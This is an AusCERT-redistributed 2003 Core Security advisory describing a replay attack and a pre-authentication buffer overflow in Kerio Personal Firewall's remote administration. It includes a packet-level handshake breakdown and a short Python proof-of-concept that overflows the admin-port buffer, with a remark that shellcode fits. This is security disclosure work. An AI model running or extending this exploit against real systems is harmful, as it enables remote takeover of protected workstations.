copyright | disclaimer | privacy | contact  
Australia's Leading Computer Emergency Response Team
 
Search this site

 
On this site

 > HOME
 > About AusCERT
 > Membership
 > Contact Us
 > PKI Services
 > Publications
 > Sec. Bulletins
 > Conferences
 > News & Media
 > Services
 > Web Log
 > Site Map
 > Site Help
 > Member login





 

ESB-2003.0321 -- Core Security Technologies Advisory CORE-2003-0305-02 -- Vulnerabilities in Kerio Personal Firewall

Date: 29 April 2003

Click here for printable version
Click here for PGP verifiable version
-----BEGIN PGP SIGNED MESSAGE-----

===========================================================================
             AUSCERT External Security Bulletin Redistribution

  ESB-2003.0321 -- Core Security Technologies Advisory CORE-2003-0305-02
                Vulnerabilities in Kerio Personal Firewall
                               29 April 2003

===========================================================================

        AusCERT Security Bulletin Summary
        ---------------------------------

Product:                Kerio Personal Firewall
Vendor:                 Core Security Technologies
Operating System:       Windows
Impact:                 Reduced Security
Access Required:        Remote

- --------------------------BEGIN INCLUDED TEXT--------------------

                         Core Security Technologies Advisory
                             http://www.coresecurity.com

                      Vulnerabilities in Kerio Personal Firewall



Date Published: 2003-04-28

Last Update: 2003-04-28

Advisory ID: CORE-2003-0305-02

Bugtraq ID: 7179, 7180

CVE Name: None currently assigned

Title: Kerio Personal Firewall Replay Attack and Buffer Overflow

Class: Design Error; Boundary Error Condition (Buffer Overflow)

Remotely Exploitable: Yes

Locally Exploitable: Yes

Advisory URL:
  http://www.coresecurity.com/common/showdoc.php?idx=314&idxseccion=10

Vendors contacted:
  - Kerio
  We sent notifications mails to the following addresses:
  security@kerio.com, support@kerio.com, webmaster@kerio.com,
  kpf_bugs@kerio.com several times during March and April
  (2003-03-11, 2003-03-24, 2003-04-10, 2003-04-24) and never
  received an answer from Kerio.

Release Mode: USER RELEASE


*Vulnerability Description:*

  Kerio Personal Firewall (KPF) is a firewall for workstations designed
  to protect them against attacks from the Internet and the local
  network. We found two security vulnerabilities in KPF's remote
  administration system:

  [BID 7179]
  A replay attack is possible against the authenticated/encrypted
  channel for remote administration. A design problem in the
  authentication mechanism for remote administration allows an attacker
  to replay captured packets from a valid remote administration session
  in order to reproduce the administrator's directives to the personal
  firewall.
  For example if the attacker is able to sniff a valid session in which
  the administrator disabled the firewall capabilities, then the
  attacker will gain the ability to disable the personal firewall at
  will at any time in the future.

  [BID 7180]
  A remotely exploitable buffer overflow exists in the administrator
  authentication process.


*Vulnerable Packages:*

  Kerio Personal Firewall version 2.1.4 and previous versions.


*Solution/Vendor Information/Workaround:*

  Contact the vendor for a fix.
  Workaround: disable the remote administration feature.


*Credits:*

  These vulnerabilities were found by Emiliano Kargieman, Hernán Gips
  and Javier Burroni from Core Security Technologies during
  Bugweek 2003 (March 3-7, 2003).


*Technical Description - Exploit/Concept Code:*

  We found two security vulnerabilities in Kerio PF's remote
  administration system.

  [BID 7179]
  A replay attack is possible against the authenticated/encrypted
  remote administration channel. As a result of a design problem in the
  authentication mechanism for remote administration, it is possible
  to replay a previously captured administration session.

  If 'S' is the workstation running Kerio personal firewall and 'C' is
  the administrator workstation, the following scheme shows the initial
  key exchange and authentication packets for a remote administration
  session:

   S           C
         <--- connect
         ---> 10 bytes (0f 00 0a 00 01 00 00 00 02 00)
  [*]    ---> 128 bytes (the initial 64 bytes are 0 and the last
                         64 bytes are the 'public' key)
         ---> 128 bytes (Everything is 0ed except the last 4 bytes
                         [01 00 01 00])
  [0]    <--- 4 bytes (00 00 00 40)
  [1]    <--- 64 bytes (This 64 bytes change from session to session)
  [2]    <--- 32 bytes (From now on, everything is encrypted and differs
                        from session to session)
         ---> 4 bytes ()
  [3]    <--- 64 bytes (user authentication)
         ........
         ........  (The session continues with commands and responses)
         ........

  [*] The last 64 bytes of this packet are read from the file
  'persfw.key' on the Kerio installation directory.

  It was noted from analyzing these sessions that the first differences
  between different sessions come from the administrator's workstation
  'C'. This led us to try replaying an administration session as a
  whole, with the unexpected result that it was deemed valid by 'S'.
  This shows that in fact no randomization or serialization is used on
  the 'server' side 'S', and thus there is no way for Kerio to ensure
  that the session is new and not a replay of an old one.

  As a result, an attacker with access to an encrypted administration
  session can record the session and replay it to the server at a later
  time to reissue the administration commands to the personal firewall.
  The commands replayed can include enabling/disabling the firewall,
  adding firewall rules, etc.


  [BID 7180]
  A remotely exploitable buffer overflow exists in the administrator
  authentication process. When Administrator connects to the firewall a
  handshake occurs in order to establish an encrypted session. The 4th
  packet of the handshake (the first packet sent by the administrator)
  is a 4 byte packet data, with a fixed number of 0x40 (64) indicating
  the size of the following packet expected to contain the
  administrator's key.
  No boundary checks exist at the firewall side for processing this
  data, and the recv() reads the 4 bytes and then attempts to read the
  amount of data indicated by the 4 bytes to a buffer on the stack.
  As a result an attacker connecting to the administration port on the
  personal firewall can construct a packet sequence that will overflow
  the buffer on the stack, allowing her to execute arbitrary code on
  the machine running the personal firewall.

  It is important to note that these packets are accepted by the
  personal firewall before authentication of the administrator takes
  place.

  The following proof of concept Python script will make the program
  jump to address 0x41414141. Note that there is enough space in the
  buffer (approx. 1800 bytes) to insert a shell code.

- ---------------------
import os
import socket
import struct
import string

def g():
     fd = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
     try:
         fd.connect(('192.168.66.160', 44334))
         fd.recv(10)
         fd.recv(256)
         fd.send(struct.pack('!L', 0x149c))
         astr = 'A'*0x149c
         fd.send(astr)

     except Exception, e:
         print e
         pass

     fd.close()

g()
- ---------------------



*About Core Security Technologies*

  Core Security Technologies develops strategic security solutions for
  Fortune 1000 corporations, government agencies and military
  organizations. The company offers information security software and
  services designed to assess risk and protect and manage information
  assets.
  Headquartered in Boston, MA, Core Security Technologies can be
  reached at 617-399-6980 or on the Web at http://www.coresecurity.com.

  To learn more about CORE IMPACT, the first comprehensive penetration
  testing framework, visit:
  http://www.coresecurity.com/products/coreimpact


*DISCLAIMER:*

  The contents of this advisory are copyright (c) 2003 CORE Security
  Technologies and may be distributed freely provided that no fee is
  charged for this distribution and proper credit is given.

$Id: Kerio-advisory.txt,v 1.6 2003/04/28 14:52:05 carlos Exp $

- --------------------------END INCLUDED TEXT--------------------

You have received this e-mail bulletin as a result of your organisation's
registration with AusCERT. The mailing list you are subscribed to is
maintained within your organisation, so if you do not wish to continue
receiving these bulletins you should contact your local IT manager. If
you do not know who that is, please send an email to auscert@auscert.org.au
and we will forward your request to the appropriate person.

This security bulletin is provided as a service to AusCERT's members.  As
AusCERT did not write the document quoted above, AusCERT has had no control
over its content.  The decision to use any or all of this information is
the responsibility of each user or organisation, and should be done so in
accordance with site policies and procedures.

NOTE: This is only the original release of the security bulletin.  It may
not be updated when updates to the original are made.  If downloading at
a later date, it is recommended that the bulletin is retrieved directly
from the author's website to ensure that the information is still current.

Contact information for the authors of the original document is included
in the Security Bulletin above.  If you have any questions or need further
information, please contact them directly.

Previous advisories and external security bulletins can be retrieved from:

        http://www.auscert.org.au/render.html?cid=1980

If you believe that your system has been compromised, contact AusCERT or
your representative in FIRST (Forum of Incident Response and Security
Teams).

Internet Email: auscert@auscert.org.au
Facsimile:      (07) 3365 7031
Telephone:      (07) 3365 4417 (International: +61 7 3365 4417)
                AusCERT personnel answer during Queensland business 
                hours which are GMT+10:00 (AEST).  On call after hours 
                for member emergencies only.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: noconv
Comment: http://www.auscert.org.au/render.html?it=1967

iQCVAwUBPq6Uayh9+71yA2DNAQFGNwP/RRiQ5Zsl+St4o/+jSrgNEGkY5W0oqBjo
mB5vzfCdWgO8A03FiMTo5nkfteEE39WG167yBPyi0Wx3t4226KUsK0XKw98D+/pY
m+eEG4sZfbI47Tiv2G515ZNs3OTWl5Z+w+zoegwgv5OZpRijyBPJV43rp80WL0HX
T5Y1KfzKp10=
=z9lz
-----END PGP SIGNATURE-----